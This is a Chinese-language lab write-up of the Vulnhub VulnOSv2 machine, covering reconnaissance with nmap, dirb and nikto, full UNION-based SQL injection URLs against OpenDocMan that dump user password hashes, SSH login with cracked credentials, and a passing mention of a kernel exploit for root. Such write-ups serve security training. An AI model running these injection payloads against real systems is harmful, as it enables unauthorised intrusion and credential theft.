当前位置：首页 > news >正文

Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入账号密码 ssh连接 37292.c 脏牛提权

news 2026/2/8 3:26:18

Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入账号密码 ssh连接 37292.c 脏牛提权

一、信息收集

1、首先拿到靶场先扫一下ip

arp-scan -l

3、 2、指纹扫描

nmap -sS -sV 192.168.66.178nmap -p- -sV -A 192.168.66.253
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
这里有个22端口，可以尝试尝试匿名访问80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))6667/tcp open  irc     ngircd
这个端口第一次见到，去搜索一下是干什么的

nmap -p22,80,6667 --script=vuln 192.168.56.104历史漏洞搜索

3、访问端口

1、80端口

这里访问80端口，然后dirb和dirsearch扫描后台。

这里貌似有很多url路径，我们先看看其他端口

我丢，这里的文字是黑色的背景，一开始我还以为是我的环境出了问题

翻译一下让我们访问一个目录，并且给了我们账户密码guest/guest，ok我们接下来要尝试隧道建立了

2、6667端口

6667端口服务貌似是有一个后门

3、22端口

这里22端口需要密码，我们找一找

4、扫描目录

dirb http://192.168.66.180

这里貌似是有一个服务版本，这个我们一会儿去找找exp jQuery JavaScript Library v1.7.2

nikto -h 192.168.66.180 -p 80 我们拿nikto扫一下，上次也说了，dirb和dirsearch扫描可能会漏掉一些信息

5、寻找突破口

这里我们根据提示的文件路径我们得到了一个java的数据库

这里有一个文件上传点

然后这里有版本信息，可以找下exp

6、寻找exp

这里有一个相关版本，我们下载下来看一下这个txt文件

Ⅰ、判断mysql服务版本 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9

Ⅱ、爆库 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

这是我们得到的数据库，然后我们爆表

Ⅲ、爆表 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()

Ⅳ、爆字段 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 这里把表格换成16进制绕过一下

Ⅴ、爆密码 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

这里我们得到md5加密的账号密码，但是网上很少有好用的解密网站，可以使用下面这个链接 [https://www.somd5.com/] 这个还是比较好用的

7、隧道建立

ssh webmin@192.168.66.180
passwd:webmin1980

这里我不知道是不是一个不完整的shell，我们尝试一下pty修复一下

python -c 'import pty;pty.spawn("/bin/bash")'

7、再次寻找exp

uname -aLinux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 athlon i686 GNU/Linuxlsb_release -a

这里有两个内核提权，我们先用c版本的吧

最后丝滑小连招拿到root。

看了这么久，点个关注o不ok

后续我也会出更多打靶文章，希望大家关注！谢谢。